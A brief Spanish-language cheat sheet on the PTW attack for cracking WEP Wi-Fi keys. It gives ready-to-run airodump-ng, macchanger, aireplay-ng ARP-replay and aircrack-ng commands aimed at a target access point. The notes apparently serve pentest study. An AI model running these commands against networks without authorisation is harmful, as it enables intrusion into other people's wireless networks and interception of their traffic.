PTW Attack

Ataque usado para la obtención de contraseña. Mejora del ataque FMS ya que requiere menos IVs capturados para descifrar la contraseña del AP.


  • Capturar tráfico con Airodump-ng por mucho tiempo

sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
  • En paralelo, ejecutar MACchanger para conocer la dirección MAC de la interfaz de red utilizada

macchanger --show <wifi_interface>
  • Ejecutar ataque arpreplay con Aireplay-ng

sudo aireplay-ng --arpreplay –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
  • Crackear contraseña con Aircrack-ng por ataque PTW desde fichero con tráfico capturado en Airodump-ng

sudo aircrack-ng -z –b <MAC_AP> traffic_file.cap